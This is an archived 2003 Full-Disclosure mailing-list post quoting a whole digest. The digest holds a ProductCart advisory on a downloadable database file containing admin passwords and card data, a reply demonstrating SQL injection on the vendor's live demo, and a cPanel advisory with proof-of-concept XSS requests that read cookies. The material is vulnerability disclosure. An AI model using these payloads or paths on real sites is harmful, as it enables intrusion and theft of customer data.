lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: booger at unixclan.net (security snot) Subject: Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs Guys - Could we please limit the length of included replies on this list, to something sane? Quoting the entire thread is very annoying. Thanks. ----------------------------------------------------------- "Whitehat by day, booger at night - I'm the security snot." - CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ - ----------------------------------------------------------- On Sun, 6 Jul 2003, Markus Nielsen wrote: > On Sun, 2003-07-06 at 16:00, full-disclosure-request@...ts.netsys.com > wrote: > > Send Full-Disclosure mailing list submissions to > > full-disclosure@...ts.netsys.com > > > > To subscribe or unsubscribe via the World Wide Web, visit > > http://lists.netsys.com/mailman/listinfo/full-disclosure > > or, via email, send a message with subject or body 'help' to > > full-disclosure-request@...ts.netsys.com > > > > You can reach the person managing the list at > > full-disclosure-admin@...ts.netsys.com > > > > When replying, please edit your Subject line so it is more specific > > than "Re: Contents of Full-Disclosure digest..." > > > > > > Today's Topics: > > > > 1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh) > > 2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff) > > 3. Re: [Vulnerability] : ProductCart database file > > can be downloaded remotely (KF) > > 4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood) > > 5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) > > 6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal) > > 7. Re: tripbid secure codes (Dave Korn) > > 8. Re: [Vulnerability] : ProductCart database file > > can be downloaded remotely (Larry W. Cashdollar) > > 9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen) > > > > --__--__-- > > > > Message: 1 > > From: "Tri Huynh" <trihuynh@...up.com> > > To: <bugtraq@...urityfocus.com> > > Cc: <full-disclosure@...ts.netsys.com> > > Date: Sat, 5 Jul 2003 13:07:51 -0700 > > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely > > > > This is a multi-part message in MIME format. > > > > ------=_NextPart_000_0053_01C342F6.70CDCF30 > > Content-Type: text/plain; > > charset="iso-8859-1" > > Content-Transfer-Encoding: quoted-printable > > > > ProductCart database file can be downloaded remotely > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > PROGRAM: ProductCart > > HOMEPAGE: http://www.earlyimpact.com/productcart/ > > VULNERABLE VERSIONS: 1.0 to 2.0 > > RISK: High > > > > > > DESCRIPTION > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > ProductCart=AE is an ASP shopping cart that combines sophisticated=20 > > ecommerce features with time-saving store management tools and = > > remarkable=20 > > ease of use. It is widely used by many e-commerce sites. > > > > DETAILS > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > In the default installation, product cart database file is located at=20 > > /productcart/database/EIPC.mdb which can be accessed easily > > by any remote attackers. > > > > Sample: http://victimhost/productcart/database/EIPC.mdb > > > > The database file includes the store administration password as well as=20 > > customer's info (including credit card info).=20 > > =20 > > > > WORKAROUND > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > Rename the database file, put it in a protected directory. > > > > > > CREDITS > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > Discovered by Tri Huynh from Sentry Union > > > > > > DISLAIMER > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > The information within this paper may change without notice. Use of > > this information constitutes acceptance for use in an AS IS condition. > > There are NO warranties with regard to this information. In no event > > shall the author be liable for any damages whatsoever arising out of > > or in connection with the use or spread of this information. Any use > > of this information is at the user's own risk. > > > > > > FEEDBACK > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > > > > Please send suggestions, updates, and comments to: trihuynh@...up.com > > > > > > > > > > ------=_NextPart_000_0053_01C342F6.70CDCF30 > > Content-Type: text/html; > > charset="iso-8859-1" > > Content-Transfer-Encoding: quoted-printable > > > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> > > <HTML><HEAD> > > <META http-equiv=3DContent-Type content=3D"text/html; = > > charset=3Diso-8859-1"> > > <META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR> > > <STYLE></STYLE> > > </HEAD> > > <BODY bgColor=3D#ffffff> > > <DIV><FONT face=3DArial size=3D2><!--StartFragment -->ProductCart = > > database file can=20 > > be downloaded=20 > > remotely<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D<BR><BR>PROGRAM:=20 > > ProductCart</FONT></DIV> > > <DIV><FONT face=3DArial size=3D2>HOMEPAGE: <A=20 > > href=3D"http://www.earlyimpact.com/productcart/">http://www.earlyimpact.c= > > om/productcart/</A><BR>VULNERABLE=20 > > VERSIONS: 1.0 to 2.0</FONT></DIV> > > <DIV><FONT face=3DArial size=3D2>RISK: High</FONT></DIV><FONT = > > face=3DArial size=3D2> > > <DIV><BR> </DIV> > > <DIV>DESCRIPTION<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D<BR><BR><!--StartFragment -->ProductCart=AE=20 > > is an ASP shopping cart that combines sophisticated </DIV> > > <DIV>ecommerce features with time-saving store management tools and = > > > > remarkable </DIV> > > <DIV>ease of use. It is widely used by many e-commerce=20 > > sites.<BR><BR>DETAILS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>In=20 > > the default installation, product cart database file is located at = > > </DIV> > > <DIV>/productcart/database/EIPC.mdb which can be accessed easily</DIV> > > <DIV>by any remote attackers.</DIV> > > <DIV> </DIV> > > <DIV>Sample: <A=20 > > href=3D"http://victimhost/productcart/database/EIPC.mdb">http://victimhos= > > t/productcart/database/EIPC.mdb</A></DIV> > > <DIV> </DIV> > > <DIV>The database file includes the store administration password as = > > well as=20 > > </DIV> > > <DIV>customer's info (including credit card info). </DIV> > > <DIV> <BR><BR>=20 > > WORKAROUND<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D<BR><BR>Rename=20 > > the database file, put it in a protected=20 > > directory.<BR><BR><BR>CREDITS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Discovered=20 > > by Tri Huynh from Sentry Union</DIV> > > <DIV><BR><BR>DISLAIMER<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>The=20 > > information within this paper may change without notice. Use of<BR>this=20 > > information constitutes acceptance for use in an AS IS = > > condition.<BR>There are=20 > > NO warranties with regard to this information. In no event<BR>shall the = > > author=20 > > be liable for any damages whatsoever arising out of<BR>or in connection = > > with the=20 > > use or spread of this information. Any use<BR>of this information is at = > > the=20 > > user's own=20 > > risk.<BR><BR><BR>FEEDBACK<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Please=20 > > send suggestions, updates, and comments to: <A=20 > > href=3D"mailto:trihuynh@...up.com">trihuynh@...up.com</A><BR><BR><BR><BR>= > > </DIV></FONT></BODY></HTML> > > > > ------=_NextPart_000_0053_01C342F6.70CDCF30-- > > > > > > --__--__-- > > > > Message: 2 > > From: gyrniff <b240503@...niff.dk> > > To: full-disclosure@...ts.netsys.com > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely > > Date: Sat, 5 Jul 2003 19:37:41 +0200 > > > > URL: > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > Change the name Paul to Paul' > > > > Microsoft OLE DB Provider for ODBC Drivers > > error '80040e14' > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > > address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > > > have a nice weekend ;-) > > > > On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > ProductCart database file can be downloaded remotely > > > ================================================= > > > > > > PROGRAM: ProductCart > > > HOMEPAGE: http://www.earlyimpact.com/productcart/ > > > VULNERABLE VERSIONS: 1.0 to 2.0 > > > RISK: High > > > > > > > > > DESCRIPTION > > > ================================================= > > > > > > ProductCart? is an ASP shopping cart that combines sophisticated > > > ecommerce features with time-saving store management tools and remarkable > > > ease of use. It is widely used by many e-commerce sites. > > > > > > DETAILS > > > ================================================= > > > > > > In the default installation, product cart database file is located at > > > /productcart/database/EIPC.mdb which can be accessed easily > > > by any remote attackers. > > > > > > Sample: http://victimhost/productcart/database/EIPC.mdb > > > > > > The database file includes the store administration password as well as > > > customer's info (including credit card info). > > > > > > > > > WORKAROUND > > > ================================================= > > > > > > Rename the database file, put it in a protected directory. > > > > > > > > > CREDITS > > > ================================================= > > > > > > Discovered by Tri Huynh from Sentry Union > > > > > > > > > DISLAIMER > > > ================================================= > > > > > > The information within this paper may change without notice. Use of > > > this information constitutes acceptance for use in an AS IS condition. > > > There are NO warranties with regard to this information. In no event > > > shall the author be liable for any damages whatsoever arising out of > > > or in connection with the use or spread of this information. Any use > > > of this information is at the user's own risk. > > > > > > > > > FEEDBACK > > > ================================================= > > > > > > Please send suggestions, updates, and comments to: trihuynh@...up.com > > > > > > --__--__-- > > > > Message: 3 > > Date: Sat, 05 Jul 2003 15:30:28 -0400 > > From: KF <dotslash@...soft.com> > > To: gyrniff <b240503@...niff.dk> > > CC: full-disclosure@...ts.netsys.com > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file > > can be downloaded remotely > > > > Was that legit California data? I am sure than making someone have a > > nice weekend you just made multiple someones have a shitty month ahead > > of them... > > http://www.theregister.co.uk/content/55/31509.html > > > > -KF > > > > gyrniff wrote: > > > > >URL: > > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > >Change the name Paul to Paul' > > > > > >Microsoft OLE DB Provider for ODBC Drivers > > > error '80040e14' > > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in > > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', > > >address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'. > > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36 > > > > > >have a nice weekend ;-) > > > > > >On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > > > > > > >>ProductCart database file can be downloaded remotely > > >>================================================= > > >> > > >>PROGRAM: ProductCart > > >>HOMEPAGE: http://www.earlyimpact.com/productcart/ > > >>VULNERABLE VERSIONS: 1.0 to 2.0 > > >>RISK: High > > >> > > >> > > >>DESCRIPTION > > >>================================================= > > >> > > >>ProductCart? is an ASP shopping cart that combines sophisticated > > >>ecommerce features with time-saving store management tools and remarkable > > >>ease of use. It is widely used by many e-commerce sites. > > >> > > >>DETAILS > > >>================================================= > > >> > > >>In the default installation, product cart database file is located at > > >>/productcart/database/EIPC.mdb which can be accessed easily > > >>by any remote attackers. > > >> > > >>Sample: http://victimhost/productcart/database/EIPC.mdb > > >> > > >>The database file includes the store administration password as well as > > >>customer's info (including credit card info). > > >> > > >> > > >> WORKAROUND > > >>================================================= > > >> > > >>Rename the database file, put it in a protected directory. > > >> > > >> > > >>CREDITS > > >>================================================= > > >> > > >>Discovered by Tri Huynh from Sentry Union > > >> > > >> > > >>DISLAIMER > > >>================================================= > > >> > > >>The information within this paper may change without notice. Use of > > >>this information constitutes acceptance for use in an AS IS condition. > > >>There are NO warranties with regard to this information. In no event > > >>shall the author be liable for any damages whatsoever arising out of > > >>or in connection with the use or spread of this information. Any use > > >>of this information is at the user's own risk. > > >> > > >> > > >>FEEDBACK > > >>================================================= > > >> > > >>Please send suggestions, updates, and comments to: trihuynh@...up.com > > >> > > >> > > > > > >_______________________________________________ > > >Full-Disclosure - We believe in it. > > >Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > > > > > > > > > > > --__--__-- > > > > Message: 4 > > From: "morning_wood" <se_cur_ity@...mail.com> > > To: "gyrniff" <b240503@...niff.dk>, <full-disclosure@...ts.netsys.com> > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely > > Date: Sat, 5 Jul 2003 15:24:46 -0700 > > > > vuln to XSS too.. > > > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp > > > > ----- Original Message ----- > > From: "gyrniff" <b240503@...niff.dk> > > To: <full-disclosure@...ts.netsys.com> > > Sent: Saturday, July 05, 2003 10:37 AM > > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database > > file can be downloaded remotely > > > > > > > URL: > > > > > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239 > > > Change the name Paul to Paul' > > > > > > Microsoft OLE DB Provider for ODBC Drivers > > > error '80040e14' > > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing > > operator) in > > > query expression ''Paul'',lastName='Smith',customerCompany='Early > > Impact', > > > address='3226 Colorado Ave', city='Santa Monica', zip='90004', > > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE > > idCustomer=115'. > > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, > > line 36 > > > > > > have a nice weekend ;-) > > > > > > On Saturday 05 July 2003 22:07, Tri Huynh wrote: > > > > ProductCart database file can be downloaded remotely > > > > ================================================= > > > > > > > > PROGRAM: ProductCart > > > > HOMEPAGE: http://www.earlyimpact.com/productcart/ > > > > VULNERABLE VERSIONS: 1.0 to 2.0 > > > > RISK: High > > > > > > > > > > > > DESCRIPTION > > > > ================================================= > > > > > > > > ProductCart? is an ASP shopping cart that combines sophisticated > > > > ecommerce features with time-saving store management tools and > > remarkable > > > > ease of use. It is widely used by many e-commerce sites. > > > > > > > > DETAILS > > > > ================================================= > > > > > > > > In the default installation, product cart database file is located > > at > > > > /productcart/database/EIPC.mdb which can be accessed easily > > > > by any remote attackers. > > > > > > > > Sample: http://victimhost/productcart/database/EIPC.mdb > > > > > > > > The database file includes the store administration password as > > well as > > > > customer's info (including credit card info). > > > > > > > > > > > > WORKAROUND > > > > ================================================= > > > > > > > > Rename the database file, put it in a protected directory. > > > > > > > > > > > > CREDITS > > > > ================================================= > > > > > > > > Discovered by Tri Huynh from Sentry Union > > > > > > > > > > > > DISLAIMER > > > > ================================================= > > > > > > > > The information within this paper may change without notice. Use > > of > > > > this information constitutes acceptance for use in an AS IS > > condition. > > > > There are NO warranties with regard to this information. In no > > event > > > > shall the author be liable for any damages whatsoever arising out > > of > > > > or in connection with the use or spread of this information. Any > > use > > > > of this information is at the user's own risk. > > > > > > > > > > > > FEEDBACK > > > > ================================================= > > > > > > > > Please send suggestions, updates, and comments to: > > trihuynh@...up.com > > > > > > _______________________________________________ > > > Full-Disclosure - We believe in it. > > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > --__--__-- > > > > Message: 5 > > From: Ory Segal <ORY.SEGAL@...CTUMINC.COM> > > To: "BugTraq (E-mail)" <BUGTRAQ@...URITYFOCUS.COM>, > > "Full Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>, > > "WebAppSec (E-mail)" <webappsec@...URITYFOCUS.COM> > > Date: Sun, 6 Jul 2003 01:39:33 -0700 > > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability > > > > This message is in MIME format. Since your mail reader does not understand > > this format, some or all of this message may not be legible. > > > > ------_=_NextPart_001_01C3439A.1FBE84F0 > > Content-Type: text/plain; > > charset="iso-8859-1" > > > > //////////////////////////////////////////////////////////////////////////// > > /// > > //==========================>> Security Advisory > > <<==========================// > > //////////////////////////////////////////////////////////////////////////// > > /// > > > > ---------------------------------------------------------------------------- > > --- > > -----[ cPanel Malicious HTML Tags Injection Vulnerability > > ---------------------------------------------------------------------------- > > --- > > > > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com > > --[ Discovery Date: 06/17/2003 (Vendor was notified) > > --[ Release Date: 07/06/2003 > > --[ Product: Tested on cPanel 6.4.2-STABLE > > --[ Severity: Medium > > --[ CVE: Not assigned yet > > > > --[ Summary > > > > From the vendor's web site: > > "...The Cpanel interface is a client side interface, which allows your > > customers > > to easily control a web hosting account. With the touch of a button, they > > can > > add e-mail accounts, access their files, backup their files, setup a > > shopping > > cart, and more..." > > > > Web users can embed Malicious HTML tags in HTTP requests, which will later > > be parsed by the web site administrator's browser, in several cPanel > > screens. > > This may lead to theft of cookies associated with the domain, or execution > > of > > client-side scripts in the administrator's browser. > > > > --[ Description > > > > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web > > site > > administrator with HTTP request logs. These scripts do not sanitize the URL > > part > > of HTTP requests and present them to the administrator as is, thus, allowing > > an > > attacker to embed malicious HTML tags that will later be parsed and executed > > by > > the administrators browser. > > > > For example, lets take a look at the 'Error Log' screen: > > > > [From errlog.html] > > ... > > <b>Last 300 Error Log Messages in reverse order:</b><hr> > > <pre> > > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: > > /home/dir/public_html/foobar.html > > </pre> > > ... > > > > The following request will present a pop-up screen with the cookies > > that are currently associated with the domain: > > > > GET /<script>alert(document.cookie);</script> HTTP/1.0 > > Host: www.site.com > > > > > > --[ Note > > > > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented > > the > > latest requests as HTML links, thus the malicious payload must terminate the > > <a> > > tag before opening a new one. For example: > > > > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0 > > Host: www.site.com > > > > --[ Solution > > > > According to the vendor, the problem was fixed in version 7.0, which can be > > downloaded at: http://www.cpanel.net/downloads.htm > > > > > > > > > > Ory Segal > > Senior Security Engineer > > Sanctum, Inc. > > http://www.SanctumInc.Com/ > > > > Ampa Bldg., 1 Sapir Street. > > Mail: P.O.Box 12047 > > Herzliya 46733, ISRAEL > > > > Tel: +972-9-9586077 Ext. 236 > > Fax: +972-9-9576337 > > > > > > ------_=_NextPart_001_01C3439A.1FBE84F0 > > Content-Type: text/html; > > charset="iso-8859-1" > > Content-Transfer-Encoding: quoted-printable > > > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> > > <HTML> > > <HEAD> > > <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = > > charset=3Diso-8859-1"> > > <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version = > > 5.5.2653.12"> > > <TITLE>cPanel Malicious HTML Tags Injection Vulnerability</TITLE> > > </HEAD> > > <BODY> > > > > <P><FONT = > > SIZE=3D2>///////////////////////////////////////////////////////////////= > > ////////////////</FONT> > > <BR><FONT = > > SIZE=3D2>//=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D=3D>> Security Advisory = > > <<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= > > =3D=3D=3D=3D//</FONT> > > <BR><FONT = > > SIZE=3D2>///////////////////////////////////////////////////////////////= > > ////////////////</FONT> > > </P> > > > > <P><FONT = > > SIZE=3D2>---------------------------------------------------------------= > > ----------------</FONT> > > <BR><FONT SIZE=3D2>-----[ cPanel Malicious HTML Tags Injection = > > Vulnerability</FONT> > > <BR><FONT = > > SIZE=3D2>---------------------------------------------------------------= > > ----------------</FONT> > > </P> > > > > <P><FONT SIZE=3D2>--[ Author: Ory Segal, Sanctum inc. <A = > > HREF=3D"http://www.SanctumInc.com" = > > TARGET=3D"_blank">http://www.SanctumInc.com</A></FONT> > > <BR><FONT SIZE=3D2>--[ Discovery Date: 06/17/2003 (Vendor was = > > notified)</FONT> > > <BR><FONT SIZE=3D2>--[ Release Date: 07/06/2003 </FONT> > > <BR><FONT SIZE=3D2>--[ Product: Tested on cPanel 6.4.2-STABLE</FONT> > > <BR><FONT SIZE=3D2>--[ Severity: Medium</FONT> > > <BR><FONT SIZE=3D2>--[ CVE: Not assigned yet</FONT> > > </P> > > > > <P><FONT SIZE=3D2>--[ Summary</FONT> > > </P> > > > > <P><FONT SIZE=3D2>From the vendor's web site:</FONT> > > <BR><FONT SIZE=3D2>"...The Cpanel interface is a client side = > > interface, which allows your customers </FONT> > > <BR><FONT SIZE=3D2>to easily control a web hosting account. With the = > > touch of a button, they can </FONT> > > <BR><FONT SIZE=3D2>add e-mail accounts, access their files, backup = > > their files, setup a shopping </FONT> > > <BR><FONT SIZE=3D2>cart, and more..."</FONT> > > </P> > > > > <P><FONT SIZE=3D2>Web users can embed Malicious HTML tags in HTTP = > > requests, which will later </FONT> > > <BR><FONT SIZE=3D2>be parsed by the web site administrator's browser, = > > in several cPanel screens. </FONT> > > <BR><FONT SIZE=3D2>This may lead to theft of cookies associated with = > > the domain, or execution of </FONT> > > <BR><FONT SIZE=3D2>client-side scripts in the administrator's = > > browser.</FONT> > > <BR><FONT SIZE=3D2> </FONT> > > <BR><FONT SIZE=3D2>--[ Description</FONT> > > </P> > > > > <P><FONT SIZE=3D2>The 'Error Log' and 'Latest Visitors' screens in = > > cPanel, provide the web site </FONT> > > <BR><FONT SIZE=3D2>administrator with HTTP request logs. These scripts = > > do not sanitize the URL part </FONT> > > <BR><FONT SIZE=3D2>of HTTP requests and present them to the = > > administrator as is, thus, allowing an </FONT> > > <BR><FONT SIZE=3D2>attacker to embed malicious HTML tags that will = > > later be parsed and executed by </FONT> > > <BR><FONT SIZE=3D2>the administrators browser.</FONT> > > </P> > > > > <P><FONT SIZE=3D2>For example, lets take a look at the 'Error Log' = > > screen:</FONT> > > </P> > > > > <P><FONT SIZE=3D2>[From errlog.html]</FONT> > > <BR><FONT SIZE=3D2>...</FONT> > > <BR><FONT SIZE=3D2><b>Last 300 Error Log Messages in reverse = > > order:</b><hr></FONT> > > <BR><FONT SIZE=3D2><pre></FONT> > > <BR><FONT SIZE=3D2>[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] = > > File does not exist: </FONT> > > <BR><FONT SIZE=3D2>/home/dir/public_html/foobar.html</FONT> > > <BR><FONT SIZE=3D2></pre></FONT> > > <BR><FONT SIZE=3D2>...</FONT> > > </P> > > > > <P><FONT SIZE=3D2>The following request will present a pop-up screen = > > with the cookies </FONT> > > <BR><FONT SIZE=3D2>that are currently associated with the = > > domain:</FONT> > > </P> > > > > <P><FONT SIZE=3D2> GET = > > /<script>alert(document.cookie);</script> HTTP/1.0</FONT> > > <BR><FONT SIZE=3D2> Host: www.site.com</FONT> > > </P> > > <BR> > > > > <P><FONT SIZE=3D2>--[ Note</FONT> > > </P> > > > > <P><FONT SIZE=3D2>The 'Latest Visitors' screen of the tested version = > > (6.4.2-STABLE) presented the </FONT> > > <BR><FONT SIZE=3D2>latest requests as HTML links, thus the malicious = > > payload must terminate the <a> </FONT> > > <BR><FONT SIZE=3D2>tag before opening a new one. For example:</FONT> > > </P> > > > > <P><FONT SIZE=3D2> GET = > > /"></a><script>alert(document.cookie);</script>= > > ; HTTP/1.0</FONT> > > <BR><FONT SIZE=3D2> Host: www.site.com</FONT> > > </P> > > > > <P><FONT SIZE=3D2>--[ Solution</FONT> > > </P> > > > > <P><FONT SIZE=3D2>According to the vendor, the problem was fixed in = > > version 7.0, which can be </FONT> > > <BR><FONT SIZE=3D2>downloaded at: <A = > > HREF=3D"http://www.cpanel.net/downloads.htm" = > > TARGET=3D"_blank">http://www.cpanel.net/downloads.htm</A></FONT> > > </P> > > <BR> > > <BR> > > <BR> > > > > <P><FONT = > > SIZE=3D2> Ory = > > Segal</FONT> > > <BR><FONT SIZE=3D2> Senior Security Engineer</FONT> > > <BR><FONT SIZE=3D2> Sanctum, = > > Inc.</FONT> > > <BR><FONT SIZE=3D2> <A HREF=3D"http://www.SanctumInc.Com/" = > > TARGET=3D"_blank">http://www.SanctumInc.Com/</A></FONT> > > </P> > > > > <P><FONT SIZE=3D2>Ampa Bldg., 1 Sapir Street.</FONT> > > <BR><FONT SIZE=3D2>Mail: = > > P.O.Box 12047</FONT> > > <BR><FONT SIZE=3D2>Herzliya 46733, = > > ISRAEL</FONT> > > </P> > > > > <P><FONT SIZE=3D2>Tel: +972-9-9586077 Ext. 236</FONT> > > <BR><FONT SIZE=3D2>Fax: +972-9-9576337</FONT> > > </P> > > > > </BODY> > > </HTML> > > ------_=_NextPart_001_01C3439A.1FBE84F0-- > > > > --__--__-- > > > > Message: 6 > > Date: Sun, 06 Jul 2003 11:46:44 +0300 > > From: Ory Segal <ory.segal@...ctuminc.com> > > To: BUGTRAQ@...URITYFOCUS.COM, full-disclosure@...ts.netsys.com, > > webappsec@...URITYFOCUS.COM > > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability > > > > ------------------------------------------------------------------------------- > > -----[ cPanel Malicious HTML Tags Injection Vulnerability > > ------------------------------------------------------------------------------- > > > > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com > > --[ Discovery Date: 06/17/2003 (Vendor was notified) > > --[ Release Date: 07/06/2003 > > --[ Product: Tested on cPanel 6.4.2-STABLE > > --[ Severity: Medium > > --[ CVE: Not assigned yet > > > > --[ Summary > > > > From the vendor's web site: > > "...The Cpanel interface is a client side interface, which allows your > > customers > > to easily control a web hosting account. With the touch of a button, > > they can > > add e-mail accounts, access their files, backup their files, setup a > > shopping > > cart, and more..." > > > > Web users can embed Malicious HTML tags in HTTP requests, which will later > > be parsed by the web site administrator's browser, in several cPanel > > screens. > > This may lead to theft of cookies associated with the domain, or > > execution of > > client-side scripts in the administrator's browser. > > > > --[ Description > > > > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web > > site > > administrator with HTTP request logs. These scripts do not sanitize the > > URL part > > of HTTP requests and present them to the administrator as is, thus, > > allowing an > > attacker to embed malicious HTML tags that will later be parsed and > > executed by > > the administrators browser. > > > > For example, lets take a look at the 'Error Log' screen: > > > > [From errlog.html] > > ... > > <b>Last 300 Error Log Messages in reverse order:</b><hr> > > <pre> > > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: > > /home/dir/public_html/foobar.html > > 